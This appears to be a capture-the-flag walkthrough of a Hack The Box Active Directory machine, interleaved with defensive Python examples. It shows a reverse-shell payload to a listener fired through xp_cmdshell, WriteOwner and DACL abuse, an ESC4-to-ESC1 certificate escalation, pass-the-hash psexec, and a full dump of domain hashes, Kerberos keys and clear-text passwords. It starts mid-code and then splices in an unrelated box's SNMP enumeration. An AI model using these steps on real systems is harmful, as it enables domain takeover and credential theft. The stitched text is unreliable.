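# Options whose enablement hands a database user OS-level execution or outbound reach.
WATCHED = {
    "xp_cmdshell": "high",
    "Ole Automation Procedures": "high",
    "clr enabled": "medium",
    "Ad Hoc Distributed Queries": "medium",
    "show advanced options": "low",   # usual precursor, kept for correlation
}


@dataclass
class Finding:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int
    severity: str

    @property
    def enabled_now(self) -> bool:
        """0 -> 1 is the real transition; 1 -> 1 (as seen on the page) is a re-run."""
        return self.old == 0 and self.new == 1


def scan_errorlog(lines) -> list:
    findings = []
    for line in lines:
        m = CONFIG_CHANGE.match(line.strip())
        if not m or m["option"] not in WATCHED:
            continue
        findings.append(Finding(m["ts"], m["spid"], m["option"],
                                int(m["old"]), int(m["new"]), WATCHED[m["option"]]))
    return findings


def alerts(findings, min_severity: str = "high") -> list:
    """Enable events at or above the given severity (a 1 -> 1 re-run still counts)."""
    rank = {"low": 0, "medium": 1, "high": 2}
    return [f for f in findings if rank[f.severity] >= rank[min_severity] and f.new == 1]


# Constructed sample ERRORLOG excerpt; the spid and timestamps are invented.
SAMPLE_ERRORLOG = """\
2025-01-15 00:00:58.03 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-15 00:00:58.07 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-15 00:01:40.11 spid55      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
2025-01-15 00:02:10.20 spid12      Starting up database 'tempdb'.
2025-01-15 00:05:00.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    found = scan_errorlog(SAMPLE_ERRORLOG.splitlines())
    for f in found:
        state = "ENABLED" if f.enabled_now else f"{f.old}->{f.new}"
        print(f"{f.timestamp} {f.spid} {f.option}: {state} [{f.severity}]")
    print(f"{len(alerts(found))} high-severity enable event(s)")
```

The xp_dirtree variant is quieter precisely because it changes no configuration option and so produces no such ERRORLOG line; the signal for it is the SQL Server service account making an outbound SMB connection to a host that is not a file server, which has to come from network or endpoint telemetry rather than from this log.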
Reverse Shell
Now, there are a number of different ways to get a reverse shell here as we have command execution. I used Villain to obtain a reverse shell in this case because I want to try out some new tools.
Step#1: Fire up Villain & Generate the Payload
croc@hacker:/opt/Villain$ sudo python3 Villain.py

    ┬  ┬┬┬  ┬  ┌─┐┬┌┐┌
    └┐┌┘││  │  ├─┤││││
     └┘ ┴┴─┘┴─┘┴ ┴┴┘└┘  Unleashed

[Meta] Created by t3l3machus
[Meta] Follow on GitHub, X, YT: @t3l3machus
[Meta] Thank you!

[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Reverse TCP Multi-Handler
[0.0.0.0:8080]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler

[Info] Welcome! Type "help" to list available commands.

Villain > generate payload=windows/reverse_tcp/powershell lhost=10.10.16.32 encode
Generating payload...
powershell -ep bypass -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!
Step#2: Execute the Payload
I executed the above payload using xp_cmdshell:
SQL> enable_xp_cmdshell
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell powershell -ep bypass -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
Step#3: Session Established
We got a reverse shell session back:
Villain > [Shell] 0501eb-dcc6db-67c8eb - New session established -> 10.10.11.51 at 2025-01-15 00:01:56.
Villain > sessions

Session ID            IP Address   OS Type  User            Owner  Status
--------------------- ------------ -------- --------------- ------ ------
0501eb-dcc6db-67c8eb  10.10.11.51  Windows  SEQUEL\sql_svc  Self   Active

Villain > shell 0501eb-dcc6db-67c8eb
Interactive pseudo-shell activated. Press Ctrl+C or type "exit" to deactivate.
PS C:\Windows\system32> whoami
sequel\sql_svc
Shell as Ryan
SQL Configuration File
1. I found the SQL2019 directory in the C: drive. It really looks out of place so that might be interesting to look into!
2. In the SQL2019 > ExpressAdv_ENU directory, I found the sql-Configuration.INI file which is the configuration file for the SQL Server setup. This file can be really juicy!
3. In the configuration file, I found a new password which is likely for user sql_svc. However, there is a possibility of this password being reused as well.
*Evil-WinRM* PS C:\Users\ryan\desktop> ls

    Directory: C:\Users\ryan\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          1/14/2025   9:38 PM             34 user.txt

*Evil-WinRM* PS C:\Users\ryan\desktop> type user.txt
29d62fe*************************
Shell as Root
Reviewing BloodHound Graph
Whenever you pivot to a new user, it’s always a good practice to revisit the BloodHound Graphs. I marked ryan as owned & found that it has First Degree Object Control over ca_svc with WriteOwner privilege.
This means that ryan can modify or change the owner of ca_svc user account.
Theory Time!
First Degree Object Control
Every object in AD (e.g., users, groups, computers) has a Discretionary Access Control List (DACL). This DACL contains Access Control Entries (ACEs), which define who can do what to the object.
Normally, permissions are assigned to groups rather than individual users. However, if a user is explicitly listed in the ACEs of an object, that user has First Degree Object Control over the object.
First Degree Object Control allows a user or group to directly control a target object in Active Directory, such as another user, group, or computer, based on the permissions assigned to it in the target object's DACL. This control is independent of group membership: even if the user is removed from all groups, it can still control that object.
WriteOwner Permission
Assume a user bob is listed in the DACL of another user john with WriteOwner permission. This means that bob can change the ownership of john's account to themselves or another principal. Once bob owns john's account, they can modify the DACL of john's account to grant themselves additional permissions, such as Reset Password or Full Control. This can be utilized by an attacker to move laterally.
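The bob/john chain above rests on one Windows rule that the text implies but does not spell out: an object's owner always holds READ_CONTROL and WRITE_DAC on it, whatever the DACL says, so WriteOwner alone is enough to reach full control. The following is an added toy model, not an AD client and not from the write-up, that encodes that rule, replays the chain step by step, and shows the audit check a defender runs to find such ACEs before they are used. Object and principal names are the ones used in the text.

```python
from dataclasses import dataclass, field

# Added example modelling the DACL/owner rules described above; it is a toy, not
# an AD client, and the object names (john, bob) are the ones used in the text.

WRITE_OWNER, WRITE_DACL, GENERIC_ALL = "WriteOwner", "WriteDacl", "GenericAll"
FORCE_CHANGE_PASSWORD, READ_CONTROL = "ForceChangePassword", "ReadControl"
DANGEROUS = {WRITE_OWNER, WRITE_DACL, GENERIC_ALL, FORCE_CHANGE_PASSWORD}


@dataclass
class Ace:
    principal: str
    rights: set


@dataclass
class AdObject:
    name: str
    owner: str
    dacl: list = field(default_factory=list)

    def effective_rights(self, principal: str) -> set:
        rights = set()
        for ace in self.dacl:
            if ace.principal == principal:   # first-degree: the principal is named directly
                rights |= ace.rights
        if self.owner == principal:
            # Windows grants an object's owner READ_CONTROL and WRITE_DAC implicitly,
            # whatever the DACL says. That implicit grant is why WriteOwner is enough.
            rights |= {READ_CONTROL, WRITE_DACL}
        if GENERIC_ALL in rights:
            rights |= DANGEROUS | {READ_CONTROL}
        return rights

    def set_owner(self, actor: str, new_owner: str) -> None:
        if WRITE_OWNER not in self.effective_rights(actor):
            raise PermissionError(f"{actor} lacks WriteOwner on {self.name}")
        self.owner = new_owner

    def add_ace(self, actor: str, ace: Ace) -> None:
        if WRITE_DACL not in self.effective_rights(actor):
            raise PermissionError(f"{actor} lacks WriteDacl on {self.name}")
        self.dacl.append(ace)


def walk_writeowner_chain(obj: AdObject, actor: str) -> list:
    """Replays the bob -> john escalation from the text, step by step."""
    trace = [f"{actor} starts with {sorted(obj.effective_rights(actor))} on {obj.name}"]
    obj.set_owner(actor, actor)
    trace.append(f"{actor} is now owner; implicit rights {sorted(obj.effective_rights(actor))}")
    obj.add_ace(actor, Ace(actor, {GENERIC_ALL}))
    trace.append(f"{actor} added GenericAll; now {sorted(obj.effective_rights(actor))}")
    return trace


def audit_dacls(objects, privileged: set) -> list:
    """What a defender reviews for: dangerous rights granted directly to unprivileged principals."""
    findings = []
    for obj in objects:
        for ace in obj.dacl:
            risky = ace.rights & DANGEROUS
            if risky and ace.principal not in privileged:
                findings.append((obj.name, ace.principal, sorted(risky)))
    return findings


if __name__ == "__main__":
    john = AdObject("john", owner="Domain Admins", dacl=[Ace("bob", {WRITE_OWNER})])
    for finding in audit_dacls([john], privileged={"Domain Admins"}):
        print("[!] audit:", finding)
    for step in walk_writeowner_chain(john, "bob"):
        print(step)
```

The audit function is the useful half for a defender: it flags the WriteOwner ACE on its own, before ownership has changed, which is the same finding BloodHound surfaces as an edge from ryan to ca_svc in this write-up.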
Abusing WriteOwner
Step#1: Change the Owner
I used impacket-owneredit to change the owner of ca_svc user object to ryan.
croc@hacker$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' -dc-ip 10.10.11.51 'sequel.htb/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
Step#2: Modify the DACL
I modified the permissions for Principal ryan to have full control over ca_svc object.
croc@hacker:~$ impacket-dacledit -action write -rights 'FullControl' -principal 'ryan' -target 'ca_svc' -dc-ip '10.10.11.51' 'sequel.htb/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250117-100801.bak
[*] DACL modified successfully!
Step#3: Password Reset
Using bloodyAD, I changed the password for the ca_svc account.
The password reset was verified using nxc. Hence, we have full control over the ca_svc account.
However, note that there might be a scheduled task that resets everything because the authentication failed upon trying again after some time. So, repeat the above steps to change the password again when needed.
Way Forward
BloodHound
After owning the ca_svc account, I found that ca_svc is part of the Cert Publishers group.
Members of the Cert Publishers group are authorized to publish certificates for User objects in AD.
The documentation isn't really clear, but this effectively means that the members of this group have write access to the userCertificate attribute of users and computers.
💡 Think Box
The username ca_svc is not a coincidence, we’re certainly meant to enumerate Active Directory Certificate Services (ADCS) as a Privilege Escalation path.
Enumerating AD CS
Identify AD CS
A quick way to verify the presence of AD CS is using netexec (works both for ryan and ca_svc):
croc@hacker:~$ nxc ldap 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3 -M adcs
LDAP        10.10.11.51     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
LDAP        10.10.11.51     389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
ADCS        10.10.11.51     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.51     389    DC01             Found PKI Enrollment Server: DC01.sequel.htb
ADCS        10.10.11.51     389    DC01             Found CN: sequel-DC01-CA
It finds the same CA as we found in our nmap scan, confirming the presence of AD CS.
Identify Vulnerable Template
I used certipy-ad to enumerate the enabled and vulnerable certificate templates with the password of Pass@1234 we set above for ca_svc:
croc@hacker$ certipy-ad find -u 'ca_svc' -p 'Pass@1234' -dc-ip 10.10.11.51 -enabled -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250116105636_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250116105636_Certipy.txt'
[*] Saved JSON output to '20250116105636_Certipy.json'
A template named DunderMifflinAuthentication was detected as vulnerable to ESC4:
1. ESC4 is when a user or a group has write privileges over a certificate template. ca_svc is the user in this case that has write privileges to the DunderMifflinAuthentication certificate template.
2. This, for instance, allows the user to overwrite the configuration of the certificate template to make the template vulnerable to ESC1. This is done by enabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in the mspki-certificate-name-flag property.
3. Now being vulnerable to ESC1, we can set an arbitrary SAN and request a certificate as the administrative user.
The tool certipy-ad will do that for us by default. The -save-old parameter allows to save the old configuration, which is useful for restoring the configuration afterwards.
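To make the conditions in the three steps above concrete, here is an added example (my own Python, not Certipy code and not part of the original write-up) that evaluates the ESC4 and ESC1 conditions on a template's LDAP attributes and shows the one-bit change that turns the first into the second. The attribute values, principal names and enrollment/write rights in it are constructed; only the flag constants and EKU OIDs are real.

```python
"""Added example for this write-up; not Certipy code.

Checks the ESC4 -> ESC1 chain offline on a template's LDAP attributes: does a
low-privileged principal have write rights (ESC4), and after flipping the
enrollee-supplies-subject bit, does the template meet every ESC1 condition?
The flag constants and EKU OIDs are from MS-CRTD / MS-WCCE; the attribute
values below are constructed and do not reproduce the template on the box.
"""

# msPKI-Certificate-Name-Flag bits (MS-CRTD 2.28)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
# msPKI-Enrollment-Flag bits (MS-CRTD 2.26)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002    # "CA certificate manager approval"

# EKUs that make an issued certificate usable for Kerberos (PKINIT) logon
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def allows_client_auth(ekus):
    """Empty pKIExtendedKeyUsage means 'any purpose' (e.g. SubCA templates)."""
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def esc4_exposed(template):
    """ESC4: a low-privileged principal holds write rights on the template."""
    return bool(template["write_rights_low_priv"])


def esc1_missing(template):
    """Return the ESC1 preconditions that are NOT met; an empty list means ESC1."""
    missing = []
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        missing.append("enrollee cannot supply the subject/SAN")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        missing.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        missing.append("authorized signatures required")
    if not allows_client_auth(template["pKIExtendedKeyUsage"]):
        missing.append("EKU does not permit client authentication")
    if not template["enroll_rights_low_priv"]:
        missing.append("no low-privileged enrollment rights")
    return missing


def weaponize(template):
    """The minimal ESC4 edit: set the bit and drop the approval/signature gates.
    (Certipy's `template` command rewrites more attributes than this.)"""
    new = dict(template)
    new["msPKI-Certificate-Name-Flag"] |= CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    new["msPKI-Enrollment-Flag"] &= ~CT_FLAG_PEND_ALL_REQUESTS
    new["msPKI-RA-Signature"] = 0
    return new


def changed_attributes(old, new):
    """Diff two snapshots, the way -save-old's JSON lets you audit or revert."""
    return {k: (old[k], new[k]) for k in old if old[k] != new[k]}


# Constructed snapshot: a client-auth template that is ESC4 (ca_svc can write
# it) but not yet ESC1 (the CA builds the subject from AD, not from the CSR).
TEMPLATE = {
    "name": "DunderMifflinAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME | CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": 0x00000020,      # CT_FLAG_AUTO_ENROLLMENT
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],
    "enroll_rights_low_priv": ["SEQUEL\\Domain Users"],   # constructed
    "write_rights_low_priv": ["SEQUEL\\ca_svc"],          # the ESC4 finding
}

if __name__ == "__main__":
    print("ESC4:", esc4_exposed(TEMPLATE))
    print("ESC1 before:", esc1_missing(TEMPLATE) or "vulnerable")
    weaponized = weaponize(TEMPLATE)
    print("ESC1 after: ", esc1_missing(weaponized) or "vulnerable")
    print("changed:", changed_attributes(TEMPLATE, weaponized))
```

Run against the JSON that certipy-ad find writes, the same checks tell you which single attribute to watch for in template change auditing: an msPKI-Certificate-Name-Flag write that sets bit 0 on a client-authentication template is the ESC4 to ESC1 pivot.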
croc@hacker$ certipy-ad template -u 'ca_svc' -password 'Pass@1234' -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Enumerating the templates again now shows CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set, which is the ESC1 condition:
We can now specify an arbitrary SAN as Administrator@sequel.htb using the -upn flag and request a certificate as the administrative user:
croc@hacker$ certipy-ad req -u 'ca_svc' -p 'Pass@1234' -dc-ip '10.10.11.51' -template 'DunderMifflinAuthentication' -upn 'Administrator@sequel.htb' -ca 'sequel-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 26
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Step#3: Authenticate with Domain Admin Certificate
Certipy authenticates with the certificate via PKINIT, obtains a TGT for Administrator and then recovers the account's NT hash through Kerberos U2U. Note the "Certificate has no object SID" line above: the certificate lacks the SID security extension, and the fact that the DC still accepted it shows that strong certificate mapping (KB5014754) is not in Full Enforcement mode on this DC.
croc@hacker$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Step#4: Revert the Changes
The box has a scheduled task that resets the template anyway, but on a real engagement you would restore it yourself: the certipy-ad template command accepts the JSON written by -save-old (DunderMifflinAuthentication.json) through its -configuration option and writes the original attributes back. With the Administrator hash in hand, psexec also gives us a SYSTEM shell on the DC:
croc@hacker$ impacket-psexec administrator@10.10.11.51 -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.10.11.51.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file EDYbflMh.exe
[*] Opening SVCManager on 10.10.11.51.....
[*] Creating service Ivmh on 10.10.11.51.....
[*] Starting service Ivmh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls

    Directory: C:\Users\Administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          1/17/2025   4:41 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
54f6209*************************
Post Root
NTDS.dit
I dumped the domain secrets from NTDS.dit with secretsdump (DRSUAPI replication, plus the local SAM and LSA secrets). Two things worth noting in the output: ryan and sql_svc carry the identical NT hash b9b72edb319dce49b5da313e71491133, i.e. the same password WqSZAF6CysDQbGb3 that LSA stores in clear text for the SQLEXPRESS service, and LSA also holds a clear-text DefaultPassword for Administrator:
croc@hacker$ impacket-secretsdump administrator@10.10.11.51 -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x07057881f4c9d60499fd59bba9ae4929
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SEQUEL\DC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3
SEQUEL\DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850
SEQUEL\DC01$:des-cbc-md5:a892b025a1684ad9
SEQUEL\DC01$:plain_password_hex:799d42a4c9050c328e8bbdb7b93568b68c2b048291ccac285099a2029e7b37203a70ee818c14657a0048716ce61598e844de25b002668bf9b304071dbe5b681f8afb6b981f7ace9727b8dc45c4463f3be8ccbe7e8fd2948d677dc03ed85e5f6e903834c1c228969f7030294347ec4c57f6319edabb47b0efb564aba7f5f195e9a6815bb27fd69a4cf235d4df93f2c34a79978ade6e068c7e7e46eb1129a9e67dff6dfea58a354e6627309facd710b354fb66dcea17c845604bae941ce39fc49a3af7dc3d14bdc16d7f9c56ce9ef6243144c7ee18cf4664e5003a6c86073811a7866e70b130134934b09abd09a7964390
SEQUEL\DC01$:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::
[*] DefaultPassword
SEQUEL\Administrator:n3KuDVzUicepJ0Bm
[*] DPAPI_SYSTEM
dpapi_machinekey:0x38bfbe5761658576a78af7d4c26e7a8a1422848a
dpapi_userkey:0x3adfe88507630dfd1f8a91a579d015f2427d1016
[*] NL$KM
 0000   D4 CD C5 D0 C1 CB 45 04  6C EA 54 2E 91 E1 C3 2D   ......E.l.T....-
 0010   88 26 C2 04 00 30 F1 16  71 C1 DE A5 19 96 71 E2   .&...0..q.....q.
 0020   BB C7 38 D7 A4 25 6E 36  F0 2C 68 85 38 3E FD B1   ..8..%n6.,h.8>..
 0030   7E 3C 11 DC 3A 56 41 DC  6A 8F 32 D3 A3 F4 D8 5F   ~<..:VA.j.2...._
NL$KM:d4cdc5d0c1cb45046cea542e91e1c32d8826c2040030f11671c1dea5199671e2bbc738d7a4256e36f02c6885383efdb17e3c11dc3a5641dc6a8f32d3a3f4d85f
[*] _SC_MSSQL$SQLEXPRESS
SEQUEL\sql_svc:WqSZAF6CysDQbGb3
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::
sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::
sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::
sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::
sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:968abd11086022e97f88b30a22b0053b8ea85ba3ec7219073b2348412befd4a7
Administrator:aes128-cts-hmac-sha1-96:89e80e336f0e4e6cfc86bd492c6cad83
Administrator:des-cbc-md5:b0a4ad1a98311334
krbtgt:aes256-cts-hmac-sha1-96:fb9766744ab94559541847d2984c9831c815992e1070309a5cbc88c76b56f0cd
krbtgt:aes128-cts-hmac-sha1-96:f365950f1fe180450832470e1695d44c
krbtgt:des-cbc-md5:5db9c2fd578a1cd3
sequel.htb\michael:aes256-cts-hmac-sha1-96:e93493d0476db7d001d5f3b2ae25595b602bedc7108eaced0044748f6413a860
sequel.htb\michael:aes128-cts-hmac-sha1-96:8b8a6f85d95763c9c3fd721e8e33a270
sequel.htb\michael:des-cbc-md5:86bc0b2c3b5b5eec
sequel.htb\ryan:aes256-cts-hmac-sha1-96:676bd0149bfc8f193967991eaec21fc0af77c2364c360f363507e3d647bca2a8
sequel.htb\ryan:aes128-cts-hmac-sha1-96:4fff4b149f767c81378c977d14c5070c
sequel.htb\ryan:des-cbc-md5:1929372c084fdcd0
sequel.htb\oscar:aes256-cts-hmac-sha1-96:d0497357f3dfcbdcd80878db9ea6829f556b5eb25b3f8cbbe0416ae0223577bf
sequel.htb\oscar:aes128-cts-hmac-sha1-96:f4856b529096b1dbf3a6037ae501ce23
sequel.htb\oscar:des-cbc-md5:102f08dfb3d0c71f
sequel.htb\sql_svc:aes256-cts-hmac-sha1-96:3e9f4068aa26eebec597f04014f93846c5bd9d5b47a6acc89f16dafda3d620db
sequel.htb\sql_svc:aes128-cts-hmac-sha1-96:c3cd53730282eea99772bceb78cdf485
sequel.htb\sql_svc:des-cbc-md5:9b1357d3aea186b6
sequel.htb\rose:aes256-cts-hmac-sha1-96:f904a8eccae44567647e727118655b0e83ba8055c873dc3060c8b2d6fbcc4660
sequel.htb\rose:aes128-cts-hmac-sha1-96:efe028112c8b1662dea3a876c3fae28a
sequel.htb\rose:des-cbc-md5:0d9b13cbf88aa44f
sequel.htb\ca_svc:aes256-cts-hmac-sha1-96:d820f67f11df4ac5d4e22e9aafb7c8f2c07ea7491f06b8569d712a6eb9cf8cea
sequel.htb\ca_svc:aes128-cts-hmac-sha1-96:42d45fb86f8b69ba9b66bc195412aa15
sequel.htb\ca_svc:des-cbc-md5:405b7f263723626b
DC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3
DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850
DC01$:des-cbc-md5:c7b908f27919a854
[*] Cleaning up...
Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page.
nmap/UDP
I usually also kick off a UDP Scan alongside the TCP Scan. Since UDP scans can be slow, I limited the scan to the top 50 ports to reduce the time taken.
nmap finds SNMP being open on port 161 which can be quite juicy!
croc@hacker$ sudo nmap -sU --top-ports 50 -T3 -oN UDPScan underpass.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).

PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 51.12 seconds
Website – 80/TCP
Main Page
We get the Apache default page, as the scan already suggested:
Directory Busting
Directory enumeration did not reveal anything notable. Most discovered paths returned 403, and index.html answering 200 is normal for a default Apache install.
With such a limited attack surface, it’s worthwhile to explore UDP.
Finding the Community String
Interacting with SNMP requires a community string, which acts as a password. Read-only community strings left at the default public are very common, so guessing that first is a good bet. Kali also ships onesixtyone, which tries a list of common community strings against a host. Let's run it:
croc@hacker$ onesixtyone 10.10.11.48 -c /usr/share/doc/onesixtyone/dict.txt
Scanning 1 hosts, 50 communities
10.10.11.48 [public] Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov  6 10:38:22 UTC 2024 x86_64
Utilizing the list of common community strings provided with the tool, we found out that our target host is indeed using public as the community string.
Another approach is to use the Nmap Scripting Engine (NSE) with the snmp-brute script to enumerate the community string.
croc@hacker:~$ sudo nmap -sU -p161 --script=snmp-brute --min-rate 500 underpass.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 07:47 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.28s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute:
|_  public - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
snmpbulkwalk/snmpwalk
We can utilize snmpwalk or snmpbulkwalk in order to enumerate SNMP. But before doing that, there’s one more thing to look into.
SNMP identifies the data it holds by numeric object identifiers (OIDs). The snmp-mibs-downloader package supplies the MIB definitions that translate those numbers into readable names. Install it with apt install snmp-mibs-downloader and comment out the mibs : line in /etc/snmp/snmp.conf, which otherwise disables MIB loading:
Now, I used snmpbulkwalk to enumerate snmp using the community string of public. This revealed a username of steve@underpass.htb and the use of a daloradius server.
We can use snmp-check for that same purpose as well for more structured output:
croc@hacker$ snmp-check -c public -v 2c 10.10.11.48
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public'

[*] System information:

  Host IP address               : 10.10.11.48
  Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
  Description                   : Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov  6 10:38:22 UTC 2024 x86_64
  Contact                       : steve@underpass.htb
  Location                      : Nevada, U.S.A. but not Vegas
